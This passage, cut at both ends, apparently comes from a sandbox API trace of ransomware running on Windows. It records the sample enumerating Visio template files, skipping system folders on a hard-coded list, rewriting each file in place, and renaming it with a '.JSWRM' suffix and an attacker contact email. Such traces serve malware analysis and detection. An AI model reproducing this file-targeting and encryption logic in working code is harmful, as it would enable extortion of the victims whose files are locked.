dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.165] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22874) returned 1 [0147.165] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.165] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5950, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5950, lpOverlapped=0x0) returned 1 [0147.168] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.168] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5950, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5950, lpOverlapped=0x0) returned 1 [0147.168] CloseHandle (hObject=0x314) returned 1 [0147.168] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.169] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22c8a4e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x22c8a4e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x22c8a4e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x66f5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBCROW_U.VSSX", cAlternateFileName="DBCROW~1.VSS")) returned 1 [0147.169] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2=".") returned 1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="..") returned 1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="...") returned 1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="windows") returned -1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="recovery") returned -1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="perflogs") returned -1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="documents and settings") returned -1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="system volume information") returned -1 [0147.170] lstrcmpiW (lpString1="DBCROW_U.VSSX", lpString2="msocache") returned -1 [0147.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCROW_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCROW_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.171] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=26357) returned 1 [0147.171] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.171] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x66f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x66f0, lpOverlapped=0x0) returned 1 [0147.175] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.175] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x66f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x66f0, lpOverlapped=0x0) returned 1 [0147.175] CloseHandle (hObject=0x314) returned 1 [0147.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.176] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x57ab, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBCROW_U.VSTX", cAlternateFileName="DBCROW~1.VST")) returned 1 [0147.176] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2=".") returned 1 [0147.176] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="..") returned 1 [0147.176] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="...") returned 1 [0147.176] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="windows") returned -1 [0147.177] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="recovery") returned -1 [0147.177] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="perflogs") returned -1 [0147.177] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="documents and settings") returned -1 [0147.177] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.177] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="system volume information") returned -1 [0147.177] lstrcmpiW (lpString1="DBCROW_U.VSTX", lpString2="msocache") returned -1 [0147.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCROW_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_U.VSTX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBCROW_U.VSTX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBCROW_U.VSTX", lpUsedDefaultChar=0x0) returned 13 [0147.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.178] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22443) returned 1 [0147.178] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.178] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x57a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x57a0, lpOverlapped=0x0) returned 1 [0147.181] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.181] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x57a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x57a0, lpOverlapped=0x0) returned 1 [0147.181] CloseHandle (hObject=0x314) returned 1 [0147.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBCROW_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbcrow_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.182] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ee8cf4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ee8cf4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1ee8cf4, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x79e6, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBIDEF1X_M.VSSX", cAlternateFileName="DBIDEF~2.VSS")) returned 1 [0147.182] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2=".") returned 1 [0147.182] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="..") returned 1 [0147.183] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="...") returned 1 [0147.183] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="windows") returned -1 [0147.183] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="recovery") returned -1 [0147.183] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="perflogs") returned -1 [0147.183] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="documents and settings") returned -1 [0147.183] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.183] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="system volume information") returned -1 [0147.183] lstrcmpiW (lpString1="DBIDEF1X_M.VSSX", lpString2="msocache") returned -1 [0147.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_M.VSSX", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_M.VSSX", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBIDEF1X_M.VSSX", lpUsedDefaultChar=0x0) returned 15 [0147.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_M.VSSX", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_M.VSSX", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBIDEF1X_M.VSSX", lpUsedDefaultChar=0x0) returned 15 [0147.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.184] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=31206) returned 1 [0147.184] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.184] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x79e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x79e0, lpOverlapped=0x0) returned 1 [0147.187] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.187] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x79e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x79e0, lpOverlapped=0x0) returned 1 [0147.188] CloseHandle (hObject=0x314) returned 1 [0147.188] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.189] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a1f7cc, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a1f7cc, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a1f7cc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x6273, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBIDEF1X_M.VSTX", cAlternateFileName="DBIDEF~2.VST")) returned 1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2=".") returned 1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="..") returned 1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="...") returned 1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="windows") returned -1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="recovery") returned -1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="perflogs") returned -1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="documents and settings") returned -1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="system volume information") returned -1 [0147.189] lstrcmpiW (lpString1="DBIDEF1X_M.VSTX", lpString2="msocache") returned -1 [0147.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_M.VSTX", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_M.VSTX", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBIDEF1X_M.VSTX", lpUsedDefaultChar=0x0) returned 15 [0147.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_M.VSTX", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_M.VSTX", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBIDEF1X_M.VSTX", lpUsedDefaultChar=0x0) returned 15 [0147.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.189] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.190] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=25203) returned 1 [0147.190] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.191] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x6270, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x6270, lpOverlapped=0x0) returned 1 [0147.194] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.194] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x6270, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x6270, lpOverlapped=0x0) returned 1 [0147.194] CloseHandle (hObject=0x314) returned 1 [0147.195] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.196] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16b6b75, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x16b6b75, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x16dce02, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7557, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DBIDEF1X_U.VSSX", cAlternateFileName="DBIDEF~1.VSS")) returned 1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2=".") returned 1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="..") returned 1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="...") returned 1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="windows") returned -1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="recovery") returned -1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="perflogs") returned -1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="documents and settings") returned -1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="system volume information") returned -1 [0147.196] lstrcmpiW (lpString1="DBIDEF1X_U.VSSX", lpString2="msocache") returned -1 [0147.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_U.VSSX", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_U.VSSX", cchWideChar=15, lpMultiByteStr=0x345e870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBIDEF1X_U.VSSX", lpUsedDefaultChar=0x0) returned 15 [0147.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_U.VSSX", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0147.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DBIDEF1X_U.VSSX", cchWideChar=15, lpMultiByteStr=0x345e840, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DBIDEF1X_U.VSSX", lpUsedDefaultChar=0x0) returned 15 [0147.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DBIDEF1X_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dbidef1x_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.197] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=30039) returned 1 [0147.197] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, 